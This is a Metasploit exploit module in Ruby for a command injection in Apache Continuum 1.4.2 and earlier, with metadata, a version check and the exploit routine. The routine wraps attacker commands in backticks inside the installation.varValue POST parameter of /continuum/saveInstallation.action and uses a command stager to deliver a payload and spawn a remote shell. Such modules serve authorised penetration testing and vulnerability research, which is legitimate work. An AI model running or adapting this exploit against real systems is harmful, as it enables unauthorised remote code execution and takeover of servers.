##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Apache Continuum Arbitrary Command Execution',
        'Description' => %q{
          This module exploits a command injection in Apache Continuum <= 1.4.2.
          By injecting a command into the installation.varValue POST parameter to
          /continuum/saveInstallation.action, a shell can be spawned.
        },
        'Author' => [
          'David Shanahan', # Proof of concept
          'wvu'             # Metasploit module
        ],
        'References' => [
          %w{CVE 2016-15057},
          %w{EDB 39886},
        ],
        'DisclosureDate' => '2016-04-06',
        'License' => MSF_LICENSE,
        'Platform' => 'linux',
        'Arch' => [ARCH_X86, ARCH_X64],
        'Privileged' => false,
        'Targets' => [
          ['Apache Continuum <= 1.4.2', {}]
        ],
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options([
      Opt::RPORT(8080)
    ])
  end

  def check
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => '/continuum/about.action'
    )

    if res && res.body.include?('1.4.2')
      CheckCode::Appears('The target appears to be vulnerable')
    elsif res && res.code == 200
      CheckCode::Detected('The target service was detected')
    else
      CheckCode::Safe('The target is not vulnerable')
    end
  end

  def exploit
    print_status('Injecting CmdStager payload...')
    execute_cmdstager
  end

  def execute_command(cmd, opts = {})
    send_request_cgi(
      'method' => 'POST',
      'uri' => '/continuum/saveInstallation.action',
      'vars_post' => {
        'installation.name' => Rex::Text.rand_text_alpha(8),
        'installation.type' => 'jdk',
        'installation.varValue' => '`' + cmd + '`'
      }
    )
  end
end
